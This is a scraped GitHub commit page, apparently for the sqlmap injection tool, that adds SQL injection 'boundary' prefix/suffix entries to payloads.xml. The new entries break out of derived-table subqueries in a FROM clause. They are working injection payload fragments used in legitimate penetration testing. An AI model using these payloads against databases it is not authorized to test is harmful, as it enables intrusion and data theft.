Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit cf4e0c7

Browse files
mwulftangemwulftange
committed
Add boundary checks for derived tables in FROM clause
1 parent 2d5461d commit cf4e0c7

1 file changed

Lines changed: 56 additions & 0 deletions

File tree

xml/payloads.xml

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -569,6 +569,62 @@ Formats:
569569
</boundary>
570570
<!-- End of pre-WHERE generic boundaries -->
571571

572+
<!-- Pre-WHERE derived table boundaries (e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
573+
<boundary>
574+
<level>5</level>
575+
<clause>1</clause>
576+
<where>1,2</where>
577+
<ptype>2</ptype>
578+
<prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
579+
<suffix>-- </suffix>
580+
</boundary>
581+
582+
<boundary>
583+
<level>5</level>
584+
<clause>1</clause>
585+
<where>1,2</where>
586+
<ptype>2</ptype>
587+
<prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
588+
<suffix>-- </suffix>
589+
</boundary>
590+
591+
<boundary>
592+
<level>5</level>
593+
<clause>1</clause>
594+
<where>1,2</where>
595+
<ptype>1</ptype>
596+
<prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
597+
<suffix>-- </suffix>
598+
</boundary>
599+
600+
<boundary>
601+
<level>4</level>
602+
<clause>1</clause>
603+
<where>1,2</where>
604+
<ptype>2</ptype>
605+
<prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
606+
<suffix>-- </suffix>
607+
</boundary>
608+
609+
<boundary>
610+
<level>5</level>
611+
<clause>1</clause>
612+
<where>1,2</where>
613+
<ptype>4</ptype>
614+
<prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
615+
<suffix>-- </suffix>
616+
</boundary>
617+
618+
<boundary>
619+
<level>4</level>
620+
<clause>1</clause>
621+
<where>1,2</where>
622+
<ptype>1</ptype>
623+
<prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
624+
<suffix>-- </suffix>
625+
</boundary>
626+
<!-- End of pre-WHERE derived table boundaries -->
627+
572628
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
573629
<boundary>
574630
<level>5</level>

0 commit comments

Comments
 (0)